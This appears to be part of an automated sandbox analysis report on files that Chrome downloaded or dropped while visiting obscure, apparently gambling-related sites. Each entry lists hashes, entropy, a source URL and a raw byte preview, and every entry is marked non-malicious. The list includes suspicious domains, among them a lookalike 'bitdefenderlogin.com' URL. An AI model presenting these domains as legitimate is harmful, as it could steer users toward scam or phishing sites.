                                                                                                                                                          Preview:...........V[O.@.~.......51.a.Q./..&..1d...-...KH.E..........`..5&.e.7..'..3...>..y..9....o.[q......T...=K.e......&1... X.8@MQ.fVG...Cy..*I.Q....!..<..&.t{N. .....9...a...T.b..................}I..v...2.f.....{..W...}.......o../.....s.x.l~..o.....U.......{.L.O.a.u.:l*K.wR;.da.9A...8,...#K.2...c#......if....<g@..y..E"......@T..T..9.1-....,........a..b.....j...p."M.3r........?....o...r.?Z..a.e+...z..U.W.%.....A:.1z..b@U.lx9...E1.:.k%..M.a....4..}E....Qq,.Ft. .kc. ...d...Q..UD.l.......itDmG.i....XZ6|zD....Z..H.R..pm..........B.J.Z.......W..u...&...,..ZR...O#..N...]e...F...%..oo....O.u...........P.T9#5hP.W.x."vh.M.sC*.......A8...+......+....[.o..L.L.....F7.z.&..~.G......BmQ]5...O....F..kk...crj.....F.7l.0..5.L.I....[R...:j.........p_.q.(<.....F!2(...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:GIF image data, version 89a, 1020 x 70
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):213703
                                                                                                                                                          Entropy (8bit):7.961452675287092
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:JTUJC20b2PtheqAhJDNOfU+eapJU+eapJU+0kVbjqMfgRMpbTTchzFpEl6LJqgjz:ugiFheqAhJ0UCUCUnkonOlTaz79Jhz
                                                                                                                                                          MD5:FAB3999B42FBE5C01E031D171AA0B90C
                                                                                                                                                          SHA1:E7F7941921F1D1B4867ECEA3ED67952A983E5C3F
                                                                                                                                                          SHA-256:A6A6911BD5946E5E93CD8FE3A20EAEC83D0B0F66908E98655A4C1C9F5723424A
                                                                                                                                                          SHA-512:62805B794B50EFCB8C3CE48A40E41F4B41A06E45ED15F78419DECD827DEEF1269C16EF9BD40AD162888FFCA50D0089B9EE91EBE195813E5E729B2731D8597662
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:GIF89a..F.......Uo....,T....=.y...........E..Y......9i.........ww......rZhdb........x.....w...s.....o...Kx.........q.......f...........................Y..LH.......e.......U...z.....X..u..9a..5....n..k....m..........Iy.........K...........!............P.......fM;...%J............A.......Er...............u.............g..O}.Bm.3Oe..................t..i.............:..Tw..............C5+Y.....5m........}...........M............V................._..Z...........\...J.......e..D.........................j|.]......u....B.........A..._......A..L..N.........9.....~~}.................0.i(.8...7.....................................w......Ny....$k...............Q..........&.&,(..........!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164488, 2020/07/10-22:06:53 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1x1, components 1
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):332
                                                                                                                                                          Entropy (8bit):6.8679847753890115
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:dfNIOW/mfM8plt//kC7kmdViN0XxgRPWTTbOsvWGKkCHdcfmcGn1NMf/qLnDzofo:FC9YM8p//slJ0Xx0WzOsvWGKkCHdcfmx
                                                                                                                                                          MD5:BD9D76386CEE85AC4BE2F43FB3156A02
                                                                                                                                                          SHA1:D1BFC8928661CA2B2F71562EDC745419C582A88E
                                                                                                                                                          SHA-256:A26A53CFBFBF7CAE14898AC89EE39558CD9ED81D4E1D86FF2E5D17B6C185DC1F
                                                                                                                                                          SHA-512:7CDBE4BDD27C94FB93BE7DFFD3AB47BFA785FF578FB6EBFB5DEDA7527CA1122A76AAB1BBC900C02AA2E95686DC0B52CE95C9589721E89B771FBC7079C5057AD8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342..................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................................?.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):20027
                                                                                                                                                          Entropy (8bit):7.963371497875305
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:ITa1uA+fOWplgEF9zASXi/D/tvBmkNr8rG5mn3kMFen:ITaC5peEj01Q8r75CzFen
                                                                                                                                                          MD5:CFF93AD3AF5B98A472DCD451E0E50CAC
                                                                                                                                                          SHA1:2DF7BB9E726A9992EFBF691D69661D84F96AB5B9
                                                                                                                                                          SHA-256:CB9A7B35081FE5D28C85E543DC38AE3E8174FCD9A228094C4E29FE96C57BD6B9
                                                                                                                                                          SHA-512:3784694E01625E7A473962E4D71BC9947A94870B5E1041E93677A59B8FFD8D28C89792139CF7631561CD2C8C368B6148E9D64910C3673B413C9189E6B5FE4C03
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:BDA0C9838D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:BDA0C9828D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1123
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):738
                                                                                                                                                          Entropy (8bit):7.652339954965864
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:XS9Kz+l+AIehweMiNllur3n2o1L446CXZtnj9J5Y64Vw+/XuqeYj9/tIgo9EhOem:XS9FYeee7llE32248XZ7/Y64C+mZ+9lE
                                                                                                                                                          MD5:F6EF6A1F9CF7C9A329B08360CAF537C8
                                                                                                                                                          SHA1:E9E651C58357699DC02A352433C54239B0D575B6
                                                                                                                                                          SHA-256:824858533FF1850440B72F9212EAF2E276B152C58ACCD29882AD39DD37A578A5
                                                                                                                                                          SHA-512:A73F8235037A4CDAAF13D424AC4608CF6E83722E5F0D09F7B0F02E081A5594E57BDEAEF276ED4E40B29F4610BD1BD0E61CE060E14EA032966EB7A3119EBF51A5
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:..........\.Mo.0...|.(..R.K....Zm..6..;.4!.qRw..lg]Y{....@H....@.E\X?.Z.o...-..,?......O.L...i.UC...V.r.......m`..l..F.6T.82....{....7f.y&kVF8h.B...^.IR....p...mp..v@.r.$H..F2..E.Vz.3...@.{M.m.......es..q...)...m$..R.i.......$.........rbB.Q.`..].....( ..9.r.$.P..C."R.I($.r7o.A..R...8-pn.m...4....n..=Z[.L..U.n-.......J9....e?.8,....*.K>(M..D.(o..xe.6..E.j...&...a..,'.:....P.O=.|.+.#c~..J.. ...v..v$3k<e.6.z.kC...9..H.....y..Q....y..DDy=......t.v.eo.3'..4I..bV........"..$.J........_...;...s.ex..#..3.I#UZ.Dn.y@1./`NK.Sr:...Cq.B.h..;m...>I...[>.TB.......c.)..ynH.I..|..H...f._....B.Ix.......<-................Y.[m.ck.+T....e..R.k.|...N.R..9K~n.F.O.k...Fg................p8>y....%...$.2F..%............>.Q.c...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2153
                                                                                                                                                          Entropy (8bit):7.350943969357906
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:u1hiyWwylZ82lYSqMHi4OyV7zT3XyJ3VyAvGbDEztGpW7gsC+lUQIl4jUM1+S3hu:0uinNuiY5eJ3fWD97+SdlGwwFLDe
                                                                                                                                                          MD5:168AAAAE57F32099066336ACA1A5A4D1
                                                                                                                                                          SHA1:56D836A065E0FF03F655BDAAB9D7FC66217648B5
                                                                                                                                                          SHA-256:DC31AA1C5B25425C763EEBC5B2B6917DE930A61A21EB9065A943679DE092F5E7
                                                                                                                                                          SHA-512:0E531989024A91FA559C84A7911D0ED1F1C1B7C335938A238AD36D3362389AD587EB7902BA2A100D0B24E043A712A5ED328DCE5A72F599600A3E0B3FF817F741
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/game_bbin_w.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpRights:Marked="False" xmpMM:OriginalDocumentID="uuid:17BBB51BCE49E711A809823CCFAF5CCB" xmpMM:DocumentID="xmp.did:E7858501F77411E78A94DA59F900EF65" xmpMM:InstanceID="xmp.iid:E7858500F77411E78A94DA59F900EF65" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:66D1DD4E49E111E79B7D9577B3604CC5" stRef:documentID="xmp.did:66D1DD4F49E111E79B7D9577B3604CC5"/> </rdf:Description> </rdf:RDF> </x:xmpme
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 280 x 342, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):8929
                                                                                                                                                          Entropy (8bit):7.8970488871395
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:I6jUIL3MAeOtYy5jGOEw6av2fjens7Q0sQPxoHsnL1SzYS0Np/bqrHnBsCnz:/jUIbbYojQBWsk9MxoHcw857/IHBVz
                                                                                                                                                          MD5:5307D1B0F586DD3D1B19DEC6FD0BF565
                                                                                                                                                          SHA1:80D4447D47970F2C957B64CE993E93BDAD1449ED
                                                                                                                                                          SHA-256:9948AA4A81A1DE7F89786F541D9BCCD119BFAF22AFEAF412C4E6121BE59C80B6
                                                                                                                                                          SHA-512:FF8AC1B454E2F6E029102FC74537D9E605F73346180773218173F1A43E9795BC2E945C864119A70E59AA4BC35A729C1FA0BD32B278A125928F2521F4E936A63F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/image-pc/index/121/member/login-bg.png
                                                                                                                                                          Preview:.PNG........IHDR.......V............tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)" xmpMM:InstanceID="xmp.iid:FFA27806FFFE11EB9E73DD25DC4EE08B" xmpMM:DocumentID="xmp.did:FFA27807FFFE11EB9E73DD25DC4EE08B"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:FFA27804FFFE11EB9E73DD25DC4EE08B" stRef:documentID="xmp.did:FFA27805FFFE11EB9E73DD25DC4EE08B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>J.X....QIDATx....@.u......3...y..8&(.)....=.].=..).Im....k...lnm.vhE.EY..%>i..b..'...y..1.....o`..u..i...;.0...f
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (12770), with CRLF line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):48883
                                                                                                                                                          Entropy (8bit):5.895719351461312
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:0u8tECCvnRM7cDkbzEUF+ac8qDASSSYu8n+niAVFD8TAdy9pmyQg8jUgFgi09/Ld:0sCaa7c4zEUF4TDASSSYJ+VVVOegN9Z
                                                                                                                                                          MD5:753C69F5B67A5DFE5CF11DDD01470304
                                                                                                                                                          SHA1:E81D212744CB7AA6453BA1EA7621D3DFF5C930BC
                                                                                                                                                          SHA-256:5FF3009B9DB304FC23897443B8249CBDA798CB417999517C5F295BB8CB8B32B7
                                                                                                                                                          SHA-512:E29963F1B911AA839BD194443F432146E85607923D0FF3C702524E8AB6894C318AB8E9CB3BBD5ECA3467046037F6C2F3E3327F20E8D4C08150AEE75018E5B608
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://f21714.com/
                                                                                                                                                          Preview:<!DOCTYPE html>..<html lang="en">....<head>.. <meta charset="utf-8">.. <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1">.. <meta property="og:description" content="Welcome">.. <title></title>.. <style>.. html,.. body {.. margin: 0;.. padding: 0.. }.... .retry {.. display: none;.. text-align: center;.. height: auto;.. width: 100%;.. line-height: 3rem;.. padding: 0 .5rem;.. box-sizing: border-box;.. position: absolute;.. top: 50%;.. left: 50%;.. transform: translate(-50%, -50%);.. }.... .retry .btn {.. border: 1px solid #eee;.. border-radius: 4px;.. width: 120px;.. display: inline-block;.. font-size: 16px;.. cursor: pointer;.. box-sizing: border-box;.. }.... .retry .btn:hover {.. color: red;.. }.... .counts {.. color: red;.. display: inline-block;.. width: 24px.. }.... .iswx {..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1979
                                                                                                                                                          Entropy (8bit):7.43816398930614
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:7ANn2N1YJ31WQTLkSei0ah9e8+/CjqD8uUr:c2QLQiLZ+/CZv
                                                                                                                                                          MD5:C7FEF1618C5C8A11A201B4A062C23ED6
                                                                                                                                                          SHA1:63EEB8430F24572719EEB9C6A9FB5B82B3511B14
                                                                                                                                                          SHA-256:F8F8C49479A704ADB7A633492E0C47E7F8D099CB01FF4E4FF654EC04CA6294DD
                                                                                                                                                          SHA-512:C138138632689424429B89FE46C4C47A73946068BDEDCCD14FE8AD54C3B544CD9C22FC749C5C4F4B69F21641B8ED6292EF3254DEC567C9A62BEB971BE3BC99B2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/sport_sbo_w.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:48CF716455BD11E99A67F2F3D966C0A4" xmpMM:DocumentID="xmp.did:48CF716555BD11E99A67F2F3D966C0A4"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:48CF716255BD11E99A67F2F3D966C0A4" stRef:documentID="xmp.did:48CF716355BD11E99A67F2F3D966C0A4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>#P./...+IDATx..VklSe.~O{...n.;...T..*..#*jL\...$........ 3.K..d..M$f.?..d...!.w)....,..[...AG..k{...j.u...Db.<.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1862
                                                                                                                                                          Entropy (8bit):5.794140484746066
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:xdmdpexyWEHdTc8mEAj+FIFh6EQ6Jl66J1jdOGO7wcDUNu:Dmdpecyn+tqOabpSwu
                                                                                                                                                          MD5:FA91B86293C33848631CD835A31ACE19
                                                                                                                                                          SHA1:CB09293E76FA97E8B0FDF4639B9B091689A962E0
                                                                                                                                                          SHA-256:8A4942489EA9D6E193B1BAA3B3B84D0FCC46C99CF2F07E611698CF9BFC501365
                                                                                                                                                          SHA-512:22F2B18D33229D3E9845031C41219B29B776C6C02F7A71A04E3DE95B557F9581B893088867EB66D1EB7A899B1F688E9566C9BAAD7709757DE5F0FBE602218222
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://x551005.com/images/favicon.png
                                                                                                                                                          Preview:<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">.</head>.<body>.</body>.<script src="/__error_/static/jquery-3.6.0.min.js"></script>.<script src="/__error_/static/_errorPageModule.js"></script>.<script>.. new ErrorPageModule({. classList: 'black',. TypeError: '404',. TypeSite: 'default',. siteLogo: 'htchess_01',. TypeInfo_CN: ".....",. TypeInfo_EN: "Not Found",. ip: '...............',. cn: "........................",. us: "Sorry, the page you are searching for does not exist",. jp: "................",. ko: "...... .... .... ....",. vi: "Xin l.i, trang b.n .ang t.m ki.m kh.ng t.n t.i",. in: ".... ....! .... ...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:GIF image data, version 89a, 1000 x 100
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):318019
                                                                                                                                                          Entropy (8bit):7.964658734585525
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:rmHumomomo12kNWmMt0DKmMt0DKmMt0DKmMt0rFU7U7U7:rmxXX2BNPMt0nMt0nMt0nMt0r2oo7
                                                                                                                                                          MD5:823F67F776FD8291FA56D784F50B58E2
                                                                                                                                                          SHA1:6F9A1A9F4BAD69EFA656CBE281889A342306404B
                                                                                                                                                          SHA-256:4D2EBB755F2E002F222BB298F55DDA52EE6F5C680634245E87103F500BBD907A
                                                                                                                                                          SHA-512:AB2E5685F361F233CC1FF6E3BED1CC4755735A35B9C0E55BC1DA8055F0B28CB637BCB8380AD4A9361673D4569AA9DBEFBCAA3B93A99FCF9BE9F2BDEF21E93791
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://www.image110.com/uploads/94c3b0fa5cb4f8bbeb3618f9358d7414.gif
                                                                                                                                                          Preview:GIF89a..d......f...L**.Z]j...w..5..........)..5P.....`'...........R-#................q]..w\F5.qG.."......VKFc.nc.K.......iW`].....M.8.......o.....o.......N.*.!zM..HhUM...vrtO.p...P...D.2..p..n..?1+)..._.g.0.Os.......4.s..n...........r.-.................S..9neV..n..Ko.r..kH.I.z..G.......p....ns..R...........w...........S ........#.':....f_&T......l......GoB...........h..1!.G..l.O...G......[(....1X<Rue...........L........z........X..}..W......,.....U.r..y..F...........XV^.....e\_..u@87.....h.....2......B9.5.....9.b..............)..e..9......4C.X.!!.Z.!! ............R......B..Z..J....c..).................k..c..Z..R..k........)..J.....J..m.......................o..J.........Z....c..c..........!..U...&@..oA...!..NETSCAPE2.0.....!.......,......d........H......*\....#J.H..E..2j.... C..I...(S.\...0c.$9d..8s.....@...J...H.*]...L...J.J...X.>....`..K.e.h.]...p.....x..eX.........l...+^...!t.J.L...3k...g.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1123
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):738
                                                                                                                                                          Entropy (8bit):7.652339954965864
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:XS9Kz+l+AIehweMiNllur3n2o1L446CXZtnj9J5Y64Vw+/XuqeYj9/tIgo9EhOem:XS9FYeee7llE32248XZ7/Y64C+mZ+9lE
                                                                                                                                                          MD5:F6EF6A1F9CF7C9A329B08360CAF537C8
                                                                                                                                                          SHA1:E9E651C58357699DC02A352433C54239B0D575B6
                                                                                                                                                          SHA-256:824858533FF1850440B72F9212EAF2E276B152C58ACCD29882AD39DD37A578A5
                                                                                                                                                          SHA-512:A73F8235037A4CDAAF13D424AC4608CF6E83722E5F0D09F7B0F02E081A5594E57BDEAEF276ED4E40B29F4610BD1BD0E61CE060E14EA032966EB7A3119EBF51A5
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://wssa-301.shiwanxin.com:1186/zb-cloud/stat.do?pv=ajax&pa=host.info&domain=t2391.cc&terminal=1&r=6397050661
                                                                                                                                                          Preview:..........\.Mo.0...|.(..R.K....Zm..6..;.4!.qRw..lg]Y{....@H....@.E\X?.Z.o...-..,?......O.L...i.UC...V.r.......m`..l..F.6T.82....{....7f.y&kVF8h.B...^.IR....p...mp..v@.r.$H..F2..E.Vz.3...@.{M.m.......es..q...)...m$..R.i.......$.........rbB.Q.`..].....( ..9.r.$.P..C."R.I($.r7o.A..R...8-pn.m...4....n..=Z[.L..U.n-.......J9....e?.8,....*.K>(M..D.(o..xe.6..E.j...&...a..,'.:....P.O=.|.+.#c~..J.. ...v..v$3k<e.6.z.kC...9..H.....y..Q....y..DDy=......t.v.eo.3'..4I..bV........"..$.J........_...;...s.ex..#..3.I#UZ.Dn.y@1./`NK.Sr:...Cq.B.h..;m...>I...[>.TB.......c.)..ynH.I..|..H...f._....B.Ix.......<-................Y.[m.ck.+T....e..R.k.|...N.R..9K~n.F.O.k...Fg................p8>y....%...$.2F..%............>.Q.c...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1185
                                                                                                                                                          Entropy (8bit):7.6719104188528515
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:aaRkmCwn9Xh+C/sL6ixUpR4UmqSTQHNX3MI8hfPylUVVof7l:aaQG9XoOnpG3qEQ9YylOmx
                                                                                                                                                          MD5:146543E450FC14D73E0EED090A98B2A1
                                                                                                                                                          SHA1:0D3CFDC499D8FDBB095B11619E60ACDE0738E2F8
                                                                                                                                                          SHA-256:BACEDE543CDD78CD430E4D796C8B3BA7EBD7EAFB2D75D84996A08AC7DAC3A149
                                                                                                                                                          SHA-512:C5E728688DF1332153037B7F0D254FC780DEF31D8B9A2B26CEC8F4E953435FBD484DB73D5F336A6B3B035ECA8F4CE86CDC3B72F3742CA3FDA3653CE809BFEEC4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/sport_txg188_w.png
                                                                                                                                                          Preview:.PNG........IHDR...............^....1PLTE....a.b..d..N.Y.[.|7..J..j.Z.T.W.d..o..l.`..h.U..L..G..E..K.Q..N..F.[.b..O..=..l..K.m9..G..@..4.V.Q.b..M..o..n..I..E..m..?..U..m..n..G..=..M.^.U.f.X..g.\..o..N..k.e..V..Q.a..j..J.Z..M..G..m.Z..i..N.].V..K..d.b.Z..B.`.^..L..p._..N.J..@..<..D.M..>..@..I.w:...a.].^.t8..K..8..t..p..@..T..A..G..;..[..e.k.G..<..g..*../..Q..$..h..W.@..9..s...l..A.r+..o..X..#..I./.`...I....?.c..n..l.g..f.]..m.a..V..j.\.W..Q..L..n.Y..I..S..N..E..I.Y..R..O..E..p..m..j.g.g..T..C..A..o..m..l..g.a.^.[.Z..W..V..S..R..N..J..J..H..0.....tRNS.&.P>7,..............KHH541/.*)(&&&%........................................................................rf^YUNNLIIGFEECB@@73/.&&%!..Y.......IDAT(..UW.Q....;."..........[.......c..#\p.s1...YC>......T...z_..d6U.....e.D.w.V,...Y.`._..L.9e..7.......\}.JI....>....#j.HW.....G1....*...D[.p.X.&.Qd{.....H..P..s..]...4..x.....Y..!<`R4...Ee.qa{.oMs.w.N....wq.....q...N...iX{.+...0/.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (669), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):687
                                                                                                                                                          Entropy (8bit):5.217403162786378
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:1cuHAPIJAuIrVgl17rTAoIr9/7KVDI0RE+VgiF8+9Mn3IztQLPoIQBXjMnWIEnxJ:1cCAPIOuIxgPkoIhTK5ZG+VLF8+9O3IR
                                                                                                                                                          MD5:9EFC0DBB4505675569C5718E1977FE85
                                                                                                                                                          SHA1:3EFB0631C80E9B9B79153FC27BC7954F54E2A2C3
                                                                                                                                                          SHA-256:667589AACE8EDB644B6338298D68D9461AEEFA5864E18270C489BCB4CE7C6D44
                                                                                                                                                          SHA-512:E63A813F0055E0BE3C99C2F6F87E05E96077BF9939FDD26F8D50806409A446EC48021C521C5B3341A23AFE0B5ABDFB2CC4909EE7890D641F0BDB195EF2FD66BC
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://brhrjf.yuhu06.xyz/061410/rcenter/common/js/gamebox/common/errors/templateWrap.js?v=1717580749344
                                                                                                                                                          Preview:define([],function(){return Class.extend({init:function(){this.getTemplateHeader()},buildEvent:function(){var _this=this;$(window).resize(function(){_this.resizeHeight()})},getTemplateHeader:function(){var _that=this;$.ajax({url:"/commonPage/error.html",dataType:"html",type:"POST",success:function(data){$("._top").html($(data).find("div._topOri"));$("._footer").html($(data).find("div._footerOri"))},complete:function(){_that.resizeHeight()},error:function(){console.log(".........")}})},resizeHeight:function(){var resizeObj=$("._center");var topObj=$("._top");var footerObj=$("._footer");resizeObj.height($(window).height()-topObj.height()-footerObj.height())}})});
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1001
                                                                                                                                                          Entropy (8bit):6.281831312276795
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:hP4Wes3ONYPimK4wdK4h2OpUtua17ZUK45K4d0h/TNVMK:t1t+6Pu4X4h5eEK7Zd4s4UwK
                                                                                                                                                          MD5:D2EE7318C8F4D2549D0605B79977A06F
                                                                                                                                                          SHA1:000DF29C4F6311D47FB7518B1F658AFE0B8F1699
                                                                                                                                                          SHA-256:0B268288C03F83988BC99D2E0CEA8518CD2E037F1A248EE91151EF83ACE20C7B
                                                                                                                                                          SHA-512:63E9B7FB2F11BC27939380FC97A9FA9A97877E95A57C753660EAA0296FD43C66B8B80396799554A0F1AD7FA1A0386DC8ED0494212A59C44094A97AC83AAE3A2E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:http://www.bitdefenderlogin.com/home.php
